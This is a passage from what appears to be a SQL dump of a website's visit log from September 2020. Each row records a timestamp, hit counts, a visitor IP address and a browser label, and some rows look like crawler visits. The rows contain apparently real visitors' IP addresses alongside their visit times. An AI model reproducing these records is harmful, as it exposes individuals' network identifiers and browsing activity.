0,'91.196.178.5','chrome'),(536261,1599162045,1,1,0,0,'93.175.230.214','chrome'),(536262,1599162255,1,1,0,0,'94.179.142.9','chrome'),(536263,1599162309,1,1,0,0,'193.164.94.252','chrome'),(536264,1599163028,1,1,0,0,'78.154.184.203','chrome'),(536265,1599163260,1,1,0,0,'46.133.3.172','chrome'),(536266,1599163291,1,1,0,0,'178.93.148.52','chrome'),(536267,1599163322,1,1,0,0,'185.138.231.194','chrome'),(536268,1599163744,1,1,0,0,'91.195.157.254','other'),(536269,1599163879,1,1,0,0,'213.231.3.172','chrome'),(536270,1599164268,1,1,0,0,'92.112.116.253','chrome'),(536271,1599164269,1,1,0,0,'91.196.178.5','chrome'),(536272,1599164637,1,1,0,0,'173.252.87.11','other'),(536273,1599164728,1,1,0,0,'83.187.161.37','chrome'),(536274,1599165086,1,1,0,0,'93.73.43.102','chrome'),(536275,1599165256,1,1,0,0,'173.252.111.118','other'),(536276,1599165269,1,1,0,0,'37.47.99.59','chrome'),(536277,1599165277,1,1,0,0,'193.56.148.35','chrome'),(536278,1599165837,1,1,0,0,'31.41.90.247','chrome'),(536279,1599166004,1,1,0,0,'37.237.190.12','chrome'),(536280,1599166218,1,1,0,0,'95.90.244.145','chrome'),(536281,1599166247,1,1,0,0,'91.196.178.5','chrome'),(536282,1599166497,1,1,0,0,'94.231.182.41','chrome'),(536283,1599166671,1,1,0,0,'5.58.190.137','chrome'),(536284,1599166773,1,1,0,0,'176.108.120.29','chrome'),(536285,1599166937,1,1,0,0,'31.4.181.14','chrome'),(536286,1599167023,1,1,0,0,'5.173.208.143','chrome'),(536287,1599167517,1,1,0,0,'176.125.52.205','chrome'),(536288,1599168426,1,1,0,0,'176.125.52.205','chrome'),(536289,1599169367,1,1,0,0,'173.252.83.13','other'),(536290,1599169913,1,1,0,0,'212.142.160.196','chrome'),(536291,1599170295,1,1,0,0,'178.94.247.119','chrome'),(536292,1599173515,1,1,0,0,'46.211.26.56','chrome'),(536293,1599174365,1,1,0,0,'91.226.254.96','chrome'),(536294,1599178300,1,1,0,0,'173.252.87.22','other'),(536295,1599182454,1,1,0,0,'88.155.41.106','chrome'),(536296,1599184536,1,1,0,0,'69.171.251.20','other'),(536297,1599185877,1,1,0,0,'31.13.115.112','other'),(536298,1599186157,1,1,0,0,'91.245.101.160','chrome'),(536299,1599187796,1,1,0,0,'69.171.251.9','other'),(536300,1599187847,1,1,0,0,'46.211.45.43','chrome'),(536301,1599188650,1,1,0,0,'69.171.251.21','other'),(536302,1599189888,1,1,0,0,'94.231.189.158','chrome'),(536303,1599190284,2,2,0,0,'91.196.178.5','chrome'),(536304,1599191185,1,1,0,0,'91.196.178.5','chrome'),(536305,1599191561,1,1,0,0,'46.211.66.79','chrome'),(536306,1599192161,1,1,0,0,'91.196.178.5','chrome'),(536307,1599192354,1,1,0,0,'37.73.95.45','chrome'),(536308,1599192393,1,1,0,0,'46.211.78.239','chrome'),(536309,1599194115,1,1,0,0,'46.113.193.44','chrome'),(536310,1599194139,1,1,0,0,'185.244.143.146','chrome'),(536311,1599194200,1,1,0,0,'173.252.87.1','other'),(536312,1599194255,1,1,0,0,'173.252.127.27','other'),(536313,1599194362,1,1,0,0,'46.45.185.183','chrome'),(536314,1599194457,1,1,0,0,'37.73.25.117','chrome'),(536315,1599194494,1,1,0,0,'195.114.145.30','chrome'),(536316,1599194518,2,2,0,0,'18.216.164.147','chrome'),(536317,1599194629,1,1,0,0,'18.197.193.89','chrome'),(536318,1599195130,1,1,0,0,'173.252.111.6','other'),(536319,1599195613,1,1,0,0,'69.171.251.26','other'),(536320,1599196076,1,1,0,0,'195.22.108.150','chrome'),(536321,1599196687,1,1,0,0,'195.135.247.25','chrome'),(536322,1599196784,1,1,0,0,'91.231.43.229','chrome'),(536323,1599197659,1,1,0,0,'46.211.77.20','chrome'),(536324,1599197746,1,1,0,0,'94.153.68.172','chrome'),(536325,1599197874,1,1,0,0,'91.196.178.81','chrome'),(536326,1599198783,1,1,0,0,'94.153.30.252','chrome'),(536327,1599198888,1,1,0,0,'31.13.103.5','other'),(536328,1599201119,1,1,0,0,'31.13.127.18','other'),(536329,1599201961,1,1,0,0,'66.220.149.9','other'),(536330,1599202185,1,1,0,0,'91.196.178.81','chrome'),(536331,1599202339,1,1,0,0,'178.93.222.158','chrome'),(536332,1599202445,2,2,0,0,'31.13.127.18','other'),(536333,1599202446,1,1,0,0,'31.13.127.14','other'),(536335,1599202451,1,1,0,0,'31.13.127.13','other'),(536336,1599202453,1,1,0,0,'31.13.127.8','other'),(536338,1599202515,1,1,0,0,'46.133.76.67','chrome'),(536339,1599202563,1,0,1,0,'66.249.70.45',''),(536340,1599202990,1,1,0,0,'31.13.103.113','other'),(536341,1599203345,1,1,0,0,'91.231.42.97','chrome'),(536342,1599204295,1,1,0,0,'46.201.149.64','chrome'),(536343,1599204395,1,1,0,0,'91.196.178.81','chrome'),(536344,1599204964,1,1,0,0,'128.124.25.118','chrome'),(536345,1599205362,1,1,0,0,'91.196.178.81','chrome'),(536346,1599205464,1,1,0,0,'46.211.21.125','chrome'),(536347,1599205955,1,1,0,0,'213.109.226.104','chrome'),(536348,1599206476,1,1,0,0,'91.200.114.125','chrome'),(536349,1599206506,1,1,0,0,'91.196.178.81','chrome'),(536350,1599206595,1,1,0,0,'46.133.197.6','chrome'),(536351,1599206960,1,1,0,0,'195.200.245.94','chrome'),(536352,1599207506,1,1,0,0,'31.13.127.13','other'),(536353,1599208001,1,1,0,0,'83.185.92.157','chrome'),(536354,1599208029,1,1,0,0,'64.30.118.45','chrome'),(536355,1599209472,1,1,0,0,'69.171.251.6','other'),(536356,1599210219,1,1,0,0,'173.252.87.12','other'),(536357,1599210932,1,1,0,0,'173.252.83.1','other'),(536358,1599211376,1,1,0,0,'94.153.67.126','chrome'),(536359,1599211808,1,1,0,0,'173.252.83.119','other'),(536360,1599211974,1,1,0,0,'91.196.178.81','chrome'),(536361,1599212296,1,1,0,0,'173.252.127.2','other'),(536362,1599212735,1,1,0,0,'37.73.125.203','chrome'),(536363,1599212815,1,1,0,0,'91.200.114.125','chrome'),(536364,1599213136,1,1,0,0,'194.44.41.128','chrome'),(536365,1599214000,1,1,0,0,'173.252.87.120','other'),(536366,1599214312,1,1,0,0,'173.252.87.5','other'),(536367,1599214318,1,1,0,0,'66.220.149.27','other'),(536368,1599215836,1,1,0,0,'173.252.95.23','other'),(536369,1599216001,1,1,0,0,'94.153.80.85','chrome'),(536370,1599216117,1,1,0,0,'178.158.237.248','other'),(536371,1599216691,1,1,0,0,'93.13.222.75','other'),(536372,1599217279,1,1,0,0,'91.196.178.5','chrome'),(536373,1599218351,1,1,0,0,'37.63.13.149','chrome'),(536374,1599219162,1,1,0,0,'69.171.251.111','other'),(536375,1599220108,1,1,0,0,'31.13.115.111','other'),(536376,1599220388,1,1,0,0,'213.159.255.38','chrome'),(536377,1599222242,1,1,0,0,'213.108.160.43','chrome'),(536378,1599224037,1,1,0,0,'213.174.1.25','chrome'),(536379,1599224086,1,1,0,0,'173.252.127.29','other'),(536381,1599224586,1,1,0,0,'173.252.95.9','other'),(536382,1599229272,1,1,0,0,'31.13.103.9','other'),(536383,1599229913,1,1,0,0,'94.178.48.91','chrome'),(536384,1599230912,1,1,0,0,'95.46.6.169','chrome'),(536385,1599233526,1,1,0,0,'173.252.87.2','other'),(536386,1599234112,1,1,0,0,'46.164.145.46','chrome'),(536387,1599234425,1,1,0,0,'91.196.178.5','chrome'),(536388,1599234456,1,1,0,0,'69.171.251.18','other'),(536389,1599236472,1,1,0,0,'176.108.106.25','chrome'),(536390,1599237628,1,1,0,0,'91.196.178.5','chrome'),(536391,1599238796,1,1,0,0,'173.252.87.4','other'),(536392,1599239833,1,1,0,0,'31.13.115.1','other'),(536393,1599242081,1,1,0,0,'173.252.127.4','other'),(536395,1599242082,1,1,0,0,'173.252.127.30','other'),(536396,1599242331,1,1,0,0,'173.252.107.10','other'),(536397,1599243160,1,1,0,0,'188.191.65.241','chrome'),(536398,1599244072,1,1,0,0,'173.252.107.12','other'),(536399,1599244073,1,1,0,0,'173.252.107.9','other'),(536400,1599244407,1,1,0,0,'31.13.127.3','other'),(536401,1599244481,1,1,0,0,'5.58.167.193','other'),(536402,1599244918,1,1,0,0,'195.34.207.16','chrome'),(536403,1599245029,1,1,0,0,'88.155.28.42','chrome'),(536404,1599245943,1,1,0,0,'66.220.149.4','other'),(536405,1599247909,1,1,0,0,'176.121.6.66','chrome'),(536406,1599248055,1,1,0,0,'185.11.29.218','chrome'),(536407,1599248696,2,2,0,0,'193.33.39.52','chrome'),(536408,1599249158,1,1,0,0,'31.13.115.8','other'),(536409,1599249432,1,1,0,0,'173.252.83.118','other'),(536410,1599249853,1,1,0,0,'46.211.20.247','chrome'),(536411,1599250870,1,1,0,0,'173.252.127.19','other'),(536412,1599251595,1,1,0,0,'31.13.103.19','other'),(536413,1599251828,1,1,0,0,'94.231.180.17','chrome'),(536414,1599252177,1,1,0,0,'173.252.95.15','other'),(536415,1599252348,1,1,0,0,'173.252.127.29','other'),(536416,1599253076,1,1,0,0,'92.112.108.230','chrome'),(536417,1599254026,1,1,0,0,'94.231.182.41','chrome'),(536418,1599255052,1,1,0,0,'194.44.36.149','chrome'),(536419,1599257189,1,1,0,0,'173.252.111.15','other'),(536420,1599259203,1,1,0,0,'173.252.87.120','other'),(536421,1599260253,1,1,0,0,'69.171.251.17','other'),(536422,1599265815,1,1,0,0,'173.252.95.35','other'),(536423,1599266361,1,1,0,0,'173.252.95.19','other'),(536424,1599274032,1,1,0,0,'31.13.115.2','other'),(536425,1599275942,1,1,0,0,'31.13.127.24','other'),(536426,1599278848,1,1,0,0,'91.196.178.5','chrome'),(536427,1599282021,1,1,0,0,'31.13.115.24','other'),(536428,1599283932,1,1,0,0,'213.231.3.172','chrome'),(536429,1599285807,1,1,0,0,'31.13.127.23','other'),(536430,1599287942,1,1,0,0,'69.171.251.21','other'),(536432,1599288933,1,1,0,0,'31.13.127.120','other'),(536433,1599289416,1,1,0,0,'31.13.127.24','other'),(536434,1599293811,1,1,0,0,'46.45.185.185','chrome'),(536435,1599294303,1,1,0,0,'31.13.103.9','other'),(536436,1599294632,1,1,0,0,'178.93.222.158','chrome'),(536437,1599294983,1,1,0,0,'69.171.251.12','other'),(536438,1599295755,1,1,0,0,'69.171.251.113','other'),(536439,1599296568,1,1,0,0,'173.252.127.119','other'),(536440,1599298605,1,1,0,0,'91.196.178.5','chrome'),(536441,1599300817,1,1,0,0,'46.211.79.116','chrome'),(536442,1599301153,1,0,1,0,'66.249.70.45',''),(536443,1599301156,1,1,0,0,'91.223.88.251','chrome'),(536444,1599304950,1,1,0,0,'69.171.251.113','other'),(536445,1599309834,1,1,0,0,'193.30.1.53','chrome'),(536446,1599312022,1,1,0,0,'91.196.178.23','chrome'),(536447,1599312646,1,1,0,0,'157.230.213.6','other'),(536448,1599316603,1,1,0,0,'69.171.249.32','other'),(536449,1599316860,1,1,0,0,'31.13.127.15','other'),(536450,1599324787,1,1,0,0,'173.252.111.9','other'),(536451,1599325719,1,1,0,0,'88.155.167.204','chrome'),(536452,1599326030,1,1,0,0,'31.13.127.11','other'),(536453,1599329581,1,1,0,0,'31.13.127.22','other'),(536454,1599330033,1,1,0,0,'188.163.77.186','chrome'),(536455,1599330286,1,1,0,0,'88.155.167.204','chrome'),(536456,1599330911,1,1,0,0,'91.196.178.23','chrome'),(536457,1599331504,1,1,0,0,'31.13.127.24','other'),(536458,1599331505,1,1,0,0,'31.13.127.2','other'),(536459,1599332207,1,1,0,0,'173.252.111.119','other'),(536460,1599332767,1,1,0,0,'173.252.111.9','other'),(536461,1599337022,1,1,0,0,'37.73.6.21','chrome'),(536462,1599337667,1,1,0,0,'46.149.190.228','chrome'),(536463,1599341338,1,1,0,0,'178.133.73.0','chrome'),(536464,1599351050,1,1,0,0,'173.252.111.17','other'),(536465,1599360089,1,1,0,0,'91.196.178.2','chrome'),(536466,1599364485,1,1,0,0,'31.13.115.5','other'),(536467,1599371611,1,1,0,0,'37.248.156.44','chrome'),(536468,1599373448,1,1,0,0,'31.13.127.7','other'),(536469,1599374744,1,1,0,0,'31.13.127.11','other'),(536470,1599375413,1,1,0,0,'31.13.127.5','other'),(536471,1599376133,1,1,0,0,'31.13.127.24','other'),(536472,1599391169,1,0,1,0,'66.249.66.93',''),(536473,1599391704,1,1,0,0,'217.20.185.198','chrome'),(536474,1599391764,1,1,0,0,'31.13.127.21','other'),(536475,1599401347,1,1,0,0,'91.196.178.2','chrome'),(536476,1599401417,3,3,0,0,'31.13.127.2','other'),(536477,1599401418,1,1,0,0,'31.13.127.15','other'),(536478,1599401423,2,2,0,0,'31.13.127.4','other'),(536479,1599401569,1,1,0,0,'31.13.127.24','other'),(536480,1599401906,1,1,0,0,'46.211.61.38','chrome'),(536481,1599401958,1,1,0,0,'94.153.3.211','chrome'),(536482,1599402067,1,1,0,0,'46.211.77.57','chrome'),(536483,1599402077,1,1,0,0,'31.13.127.120','other'),(536484,1599402078,1,1,0,0,'31.13.127.117','other'),(536485,1599403153,1,1,0,0,'31.13.103.15','other'),(536486,1599403289,2,2,0,0,'91.196.178.2','chrome'),(536487,1599403323,1,1,0,0,'46.211.74.118','chrome'),(536488,1599403505,1,1,0,0,'31.13.127.14','other'),(536489,1599403506,1,1,0,0,'69.171.251.23','other'),(536490,1599404609,1,1,0,0,'91.196.178.2','chrome'),(536491,1599405400,1,1,0,0,'109.105.13.203','chrome'),(536492,1599405479,1,1,0,0,'91.220.61.227','chrome'),(536493,1599405898,1,1,0,0,'93.77.243.127','chrome'),(536494,1599406351,1,1,0,0,'37.52.82.209','chrome'),(536495,1599406647,1,1,0,0,'91.221.218.19','chrome'),(536496,1599406893,1,1,0,0,'173.252.127.8','other'),(536497,1599407368,1,1,0,0,'178.94.144.91','chrome'),(536498,1599407563,1,1,0,0,'91.204.87.43','chrome'),(536499,1599408016,1,1,0,0,'91.243.5.32','other'),(536500,1599408954,1,1,0,0,'173.252.79.17','other'),(536501,1599409183,1,1,0,0,'94.179.148.29','chrome'),(536502,1599410059,1,1,0,0,'173.252.127.3','other'),(536503,1599411022,1,1,0,0,'31.13.127.116','other'),(536504,1599412300,1,1,0,0,'46.211.16.125','chrome'),(536505,1599412505,1,1,0,0,'173.252.95.26','other'),(536506,1599412690,1,1,0,0,'93.75.210.215','other'),(536507,1599412756,1,1,0,0,'5.58.151.19','chrome'),(536508,1599413757,1,1,0,0,'194.44.129.136','chrome'),(536509,1599414288,1,1,0,0,'66.220.149.6','other'),(536510,1599414357,1,1,0,0,'46.211.54.118','chrome'),(536511,1599416464,1,1,0,0,'37.221.137.135','chrome'),(536512,1599416684,1,1,0,0,'173.252.111.117','other'),(536513,1599417081,1,1,0,0,'173.252.95.23','other'),(536514,1599417193,1,1,0,0,'173.252.95.26','chrome'),(536515,1599418140,1,1,0,0,'69.171.251.16','other'),(536516,1599418146,1,1,0,0,'173.252.111.18','other'),(536517,1599418908,1,1,0,0,'69.171.251.25','other'),(536518,1599419032,1,1,0,0,'91.196.178.2','chrome'),(536519,1599419052,1,1,0,0,'194.44.56.71','chrome'),(536520,1599419355,1,1,0,0,'173.252.111.19','other'),(536521,1599419552,1,1,0,0,'93.170.114.26','chrome'),(536522,1599420552,1,1,0,0,'91.196.178.2','chrome'),(536523,1599421240,1,1,0,0,'176.121.5.16','chrome'),(536524,1599421612,1,1,0,0,'31.13.127.117','other'),(536525,1599421934,1,1,0,0,'91.189.157.235','chrome'),(536526,1599422288,1,1,0,0,'188.163.115.66','chrome'),(536527,1599425375,1,1,0,0,'173.252.87.29','other'),(536528,1599426058,1,1,0,0,'31.13.127.4','other'),(536529,1599426363,1,1,0,0,'46.211.23.20','chrome'),(536530,1599427492,1,1,0,0,'66.220.149.22','other'),(536531,1599428576,1,1,0,0,'173.252.95.9','other'),(536532,1599442054,1,1,0,0,'173.252.107.117','other'),(536533,1599453123,1,1,0,0,'31.13.103.9','other'),(536534,1599453148,1,1,0,0,'31.13.103.13','other'),(536535,1599456418,1,1,0,0,'91.196.178.81','chrome'),(536536,1599460553,1,1,0,0,'31.13.127.9','other'),(536537,1599461848,1,1,0,0,'31.13.127.5','other'),(536538,1599462657,1,1,0,0,'31.13.127.13','other'),(536539,1599462658,1,1,0,0,'31.13.127.23','other'),(536540,1599462774,1,1,0,0,'188.147.42.249','chrome'),(536541,1599462882,1,1,0,0,'31.13.103.6','other'),(536542,1599470707,1,1,0,0,'91.196.178.81','chrome'),(536543,1599471799,1,1,0,0,'31.13.127.23','other'),(536544,1599472826,1,1,0,0,'94.231.183.46','chrome'),(536545,1599473111,1,1,0,0,'46.211.14.84','chrome'),(536546,1599473223,1,1,0,0,'173.252.79.5','other'),(536547,1599473419,1,1,0,0,'173.252.127.22','other'),(536548,1599473879,1,1,0,0,'173.252.95.22','other'),(536549,1599475340,1,1,0,0,'46.211.17.71','chrome'),(536550,1599478272,1,1,0,0,'31.13.127.13','other'),(536551,1599478760,1,1,0,0,'91.225.201.56','chrome'),(536552,1599478918,1,1,0,0,'178.94.144.91','chrome'),(536553,1599480259,1,1,0,0,'91.196.178.81','chrome'),(536554,1599481565,1,1,0,0,'88.255.26.162','chrome'),(536555,1599481770,1,0,1,0,'66.249.70.47',''),(536556,1599484104,1,1,0,0,'69.171.251.35','other'),(536557,1599485500,1,1,0,0,'94.153.18.75','chrome'),(536558,1599485637,1,1,0,0,'173.252.87.7','other'),(536559,1599485915,1,1,0,0,'173.252.95.19','other'),(536560,1599489154,3,3,0,0,'213.233.103.44','chrome'),(536561,1599489186,1,1,0,0,'31.13.127.24','other'),(536562,1599490960,1,1,0,0,'91.231.43.32','chrome'),(536563,1599490981,1,1,0,0,'66.220.149.118','other'),(536564,1599491624,1,1,0,0,'46.211.25.33','chrome'),(536565,1599493478,1,1,0,0,'31.13.103.11','other'),(536566,1599496509,1,1,0,0,'178.133.185.177','chrome'),(536567,1599499233,1,1,0,0,'31.13.127.13','other'),(536568,1599499706,1,1,0,0,'46.211.77.145','chrome'),(536569,1599500662,1,1,0,0,'46.211.38.136','chrome'),(536570,1599502893,1,1,0,0,'178.94.94.98','chrome'),(536571,1599503765,1,1,0,0,'173.252.107.16','other'),(536572,1599503822,1,1,0,0,'31.13.127.21','other'),(536573,1599504292,1,1,0,0,'91.196.178.2','chrome'),(536574,1599504351,1,1,0,0,'173.252.111.113','other'),(536575,1599504353,1,1,0,0,'31.13.103.18','other'),(536576,1599504354,1,1,0,0,'173.252.111.24','other'),(536577,1599505054,1,1,0,0,'31.13.103.119','other'),(536578,1599506261,1,1,0,0,'173.252.111.3','other'),(536579,1599506769,1,1,0,0,'195.135.246.139','chrome'),(536580,1599507507,1,1,0,0,'93.170.114.26','chrome'),(536581,1599507656,1,1,0,0,'176.124.234.187','chrome'),(536582,1599509186,1,1,0,0,'176.118.53.154','chrome'),(536583,1599509218,1,1,0,0,'185.234.67.7','firefox'),(536584,1599509362,1,1,0,0,'66.220.149.2','other'),(536585,1599509620,1,1,0,0,'74.125.151.45','other'),(536586,1599509937,1,1,0,0,'104.131.177.34','other'),(536587,1599513624,1,1,0,0,'104.131.182.39','other'),(536588,1599524011,1,1,0,0,'91.196.178.2','chrome'),(536589,1599535654,1,1,0,0,'46.45.185.170','chrome'),(536590,1599537417,1,1,0,0,'31.13.103.13','other'),(536591,1599545087,1,1,0,0,'91.196.178.81','chrome'),(536592,1599546354,1,1,0,0,'91.196.178.81','chrome'),(536593,1599547592,1,1,0,0,'91.196.178.81','chrome'),(536594,1599548564,1,1,0,0,'31.13.127.19','other'),(536595,1599549372,1,1,0,0,'31.13.127.22','other'),(536596,1599550350,1,1,0,0,'91.196.178.81','chrome'),(536597,1599552519,1,1,0,0,'91.196.178.81','chrome'),(536598,1599553740,1,1,0,0,'95.158.43.208','chrome'),(536599,1599553790,1,1,0,0,'91.196.178.81','chrome'),(536600,1599554138,1,1,0,0,'31.13.127.21','other'),(536601,1599555233,1,1,0,0,'95.158.43.208','chrome'),(536602,1599559356,1,1,0,0,'31.13.127.6','other'),(536603,1599559466,1,1,0,0,'31.13.127.9','other'),(536604,1599559969,1,1,0,0,'31.13.127.117','other'),(536605,1599559970,1,1,0,0,'31.13.127.14','other'),(536606,1599560680,1,1,0,0,'91.196.178.2','chrome'),(536607,1599567241,1,1,0,0,'185.244.142.164','chrome'),(536608,1599567537,1,1,0,0,'91.196.178.81','chrome'),(536609,1599567639,1,1,0,0,'31.13.127.5','other'),(536610,1599567641,1,1,0,0,'31.13.127.20','other'),(536611,1599567642,1,1,0,0,'31.13.127.9','other'),(536612,1599567649,1,1,0,0,'31.13.127.118','other'),(536613,1599567654,1,1,0,0,'31.13.127.15','other'),(536615,1599568166,1,1,0,0,'178.94.144.91','chrome'),(536616,1599568253,1,1,0,0,'194.44.220.198','chrome'),(536617,1599568785,1,1,0,0,'178.93.148.52','chrome'),(536618,1599570322,1,1,0,0,'91.196.178.81','chrome'),(536619,1599570347,1,1,0,0,'93.79.126.70','other'),(536620,1599571377,1,1,0,0,'5.58.151.121','other'),(536621,1599572105,1,1,0,0,'91.196.178.81','chrome'),(536622,1599573280,1,1,0,0,'94.153.19.132','chrome'),(536623,1599573327,1,1,0,0,'46.211.52.118','chrome'),(536624,1599573454,1,1,0,0,'46.211.66.154','chrome'),(536625,1599574450,1,1,0,0,'195.34.207.17','chrome'),(536626,1599574768,1,0,1,0,'66.249.66.91',''),(536627,1599574878,1,1,0,0,'173.252.83.12','other'),(536628,1599575421,1,1,0,0,'178.94.144.91','chrome'),(536629,1599575446,1,1,0,0,'94.158.179.95','chrome'),(536630,1599576826,1,1,0,0,'94.153.28.219','chrome'),(536631,1599579148,1,1,0,0,'91.207.245.154','chrome'),(536632,1599579400,1,1,0,0,'94.153.77.178','chrome'),(536633,1599580269,1,1,0,0,'176.118.49.10','chrome'),(536634,1599580450,1,1,0,0,'188.181.108.120','chrome'),(536635,1599583496,1,1,0,0,'91.196.178.2','chrome'),(536636,1599584560,1,1,0,0,'69.171.251.37','other'),(536637,1599584777,1,1,0,0,'46.211.38.231','chrome'),(536638,1599585148,1,1,0,0,'31.43.233.19','chrome'),(536639,1599585962,1,1,0,0,'185.16.116.143','chrome'),(536640,1599587585,1,1,0,0,'217.196.170.55','chrome'),(536641,1599587728,1,1,0,0,'95.132.135.244','chrome'),(536642,1599588310,1,1,0,0,'66.220.149.32','other'),(536643,1599588311,1,1,0,0,'66.220.149.28','other'),(536644,1599589512,2,2,0,0,'173.252.111.3','other'),(536645,1599589513,1,1,0,0,'69.171.251.1','other'),(536646,1599589514,1,1,0,0,'173.252.111.12','other'),(536647,1599589558,1,1,0,0,'94.153.71.23','chrome'),(536648,1599593001,1,1,0,0,'95.135.5.92','chrome'),(536649,1599593491,1,1,0,0,'185.234.67.7','firefox'),(536650,1599594435,1,1,0,0,'37.221.142.236','chrome'),(536651,1599594488,1,1,0,0,'94.153.10.5','other'),(536652,1599595374,1,1,0,0,'173.252.95.23','other'),(536653,1599595621,1,1,0,0,'195.16.79.174','chrome'),(536654,1599595717,1,1,0,0,'46.133.180.68','chrome'),(536655,1599596214,1,1,0,0,'188.163.42.186','chrome'),(536656,1599597170,1,1,0,0,'31.13.127.8','chrome'),(536657,1599597174,1,1,0,0,'31.13.127.4','chrome'),(536658,1599597181,1,1,0,0,'31.13.127.20','chrome'),(536659,1599597182,1,1,0,0,'31.13.127.19','chrome'),(536660,1599599381,1,1,0,0,'31.13.127.20','other'),(536661,1599601268,1,0,1,0,'66.249.66.92',''),(536662,1599616210,1,1,0,0,'173.252.95.10','other'),(536663,1599622947,1,1,0,0,'91.196.178.2','chrome'),(536664,1599623351,1,1,0,0,'94.153.21.4','chrome'),(536665,1599631942,1,1,0,0,'185.234.67.7','firefox'),(536666,1599632685,1,1,0,0,'91.196.178.81','chrome'),(536667,1599636654,1,1,0,0,'69.171.251.2','other'),(536668,1599636775,1,1,0,0,'31.13.127.16','other'),(536669,1599641606,1,1,0,0,'173.252.127.27','other'),(536670,1599643141,1,1,0,0,'91.196.178.81','chrome'),(536671,1599643822,1,1,0,0,'31.13.127.7','other'),(536672,1599644713,1,1,0,0,'91.196.178.81','chrome'),(536673,1599644725,1,1,0,0,'62.149.105.200','chrome'),(536674,1599645915,1,1,0,0,'69.171.251.21','other'),(536675,1599649109,1,1,0,0,'46.211.35.155','chrome'),(536676,1599651265,1,0,1,0,'66.249.66.91',''),(536677,1599652929,1,1,0,0,'91.196.178.81','chrome'),(536678,1599654286,1,1,0,0,'130.180.208.22','chrome'),(536679,1599655951,1,1,0,0,'31.13.115.7','other'),(536681,1599658030,1,1,0,0,'178.94.144.91','chrome'),(536682,1599658551,1,1,0,0,'173.252.95.7','other'),(536683,1599661016,1,1,0,0,'173.252.127.6','other'),(536684,1599668962,1,1,0,0,'46.211.14.252','other'),(536685,1599669134,1,1,0,0,'91.207.245.154','chrome'),(536686,1599672487,1,1,0,0,'31.13.103.14','other'),(536687,1599674055,1,1,0,0,'185.234.67.7','firefox'),(536688,1599675145,1,1,0,0,'173.252.83.24','other'),(536690,1599675146,1,1,0,0,'173.252.83.18','other'),(536692,1599680016,1,1,0,0,'185.234.67.7','firefox'),(536693,1599680017,1,1,0,0,'173.252.111.24','other'),(536694,1599687735,1,0,1,0,'66.249.66.91',''),(536695,1599687743,1,0,1,0,'66.249.66.92',''),(536696,1599719740,1,1,0,0,'31.13.127.22','other'),(536697,1599723503,1,1,0,0,'31.13.127.5','other'),(536698,1599725787,1,1,0,0,'66.220.149.24','other'),(536699,1599730225,1,1,0,0,'46.133.106.201','chrome'),(536700,1599730285,1,1,0,0,'95.132.133.178','chrome'),(536701,1599731335,1,1,0,0,'91.196.178.81','chrome'),(536702,1599734254,1,0,1,0,'66.249.66.93',''),(536703,1599742425,1,1,0,0,'91.196.178.81','chrome'),(536704,1599744736,2,2,0,0,'91.196.178.81','chrome'),(536705,1599745137,1,1,0,0,'31.13.127.116','other'),(536706,1599745138,1,1,0,0,'31.13.127.120','other'),(536707,1599745139,2,2,0,0,'31.13.127.23','other'),(536709,1599745140,3,3,0,0,'31.13.127.18','other'),(536712,1599745143,1,1,0,0,'31.13.127.13','other'),(536713,1599745158,1,1,0,0,'31.13.115.112','other'),(536715,1599745159,1,1,0,0,'31.13.127.6','other'),(536716,1599745191,1,1,0,0,'88.155.176.48','chrome'),(536717,1599745201,1,1,0,0,'91.196.177.34','chrome'),(536718,1599745225,3,3,0,0,'31.13.127.8','other'),(536719,1599745227,1,1,0,0,'31.13.127.16','other'),(536720,1599745228,2,2,0,0,'31.13.127.4','other'),(536724,1599745237,2,2,0,0,'31.13.127.117','other'),(536726,1599745238,1,1,0,0,'31.13.127.12','other'),(536727,1599745272,1,1,0,0,'94.153.22.162','chrome'),(536728,1599745293,1,1,0,0,'176.105.199.169','other'),(536729,1599745324,1,1,0,0,'185.84.148.100','chrome'),(536730,1599745395,1,1,0,0,'46.211.41.124','other'),(536731,1599745421,1,1,0,0,'46.133.176.69','chrome'),(536732,1599745446,1,1,0,0,'130.180.219.85','chrome'),(536733,1599745472,1,1,0,0,'31.13.127.15','other'),(536734,1599745474,1,1,0,0,'31.13.127.9','other'),(536735,1599745480,1,1,0,0,'31.13.127.24','other'),(536736,1599745650,1,1,0,0,'128.124.196.159','chrome'),(536737,1599745668,1,1,0,0,'46.201.135.71','chrome'),(536738,1599745750,1,1,0,0,'46.211.73.255','chrome'),(536739,1599745755,1,1,0,0,'37.73.2.30','chrome'),(536740,1599746007,1,1,0,0,'91.196.178.81','chrome'),(536741,1599746032,1,1,0,0,'94.153.78.123','chrome'),(536742,1599746051,1,1,0,0,'94.153.12.12','chrome'),(536743,1599746121,1,1,0,0,'31.13.115.11','other'),(536744,1599746241,1,1,0,0,'46.211.14.177','other'),(536745,1599746267,1,1,0,0,'69.171.251.27','other'),(536746,1599746304,1,1,0,0,'94.153.35.238','chrome'),(536747,1599746331,1,1,0,0,'31.13.127.10','other'),(536748,1599746524,1,1,0,0,'46.211.46.255','chrome'),(536749,1599746570,1,1,0,0,'91.124.183.148','other'),(536750,1599746577,2,2,0,0,'91.196.178.151','chrome'),(536751,1599746683,1,1,0,0,'37.73.193.136','chrome'),(536752,1599746765,1,1,0,0,'77.222.134.99','firefox'),(536753,1599746788,1,1,0,0,'185.235.134.106','chrome'),(536754,1599746870,1,1,0,0,'46.133.86.228','chrome'),(536755,1599746904,1,1,0,0,'91.196.178.45','chrome'),(536756,1599747028,1,1,0,0,'91.196.178.81','chrome'),(536757,1599747030,1,1,0,0,'91.196.177.34','other'),(536758,1599747059,1,1,0,0,'37.73.170.213','chrome'),(536759,1599747104,1,1,0,0,'176.227.245.6','chrome'),(536760,1599747154,1,1,0,0,'91.196.178.84','chrome'),(536761,1599747279,1,1,0,0,'195.10.210.70','chrome'),(536762,1599747476,1,1,0,0,'185.30.202.81','other'),(536763,1599747492,1,1,0,0,'91.196.178.169','other'),(536764,1599747502,1,1,0,0,'94.153.21.222','chrome'),(536765,1599747524,1,1,0,0,'69.171.249.29','other'),(536766,1599747857,1,1,0,0,'46.211.16.77','other'),(536767,1599748351,1,1,0,0,'94.153.26.123','chrome'),(536768,1599748473,1,1,0,0,'91.196.178.9','chrome'),(536769,1599748820,1,1,0,0,'91.196.178.55','chrome'),(536770,1599748941,1,1,0,0,'91.196.178.153','chrome'),(536771,1599749455,1,1,0,0,'91.196.178.48','other'),(536772,1599749749,1,1,0,0,'31.43.127.9','chrome'),(536773,1599750015,2,2,0,0,'95.158.42.123','chrome'),(536774,1599750524,1,1,0,0,'95.135.89.189','other'),(536775,1599751057,2,2,0,0,'91.196.178.2','chrome'),(536776,1599751211,1,1,0,0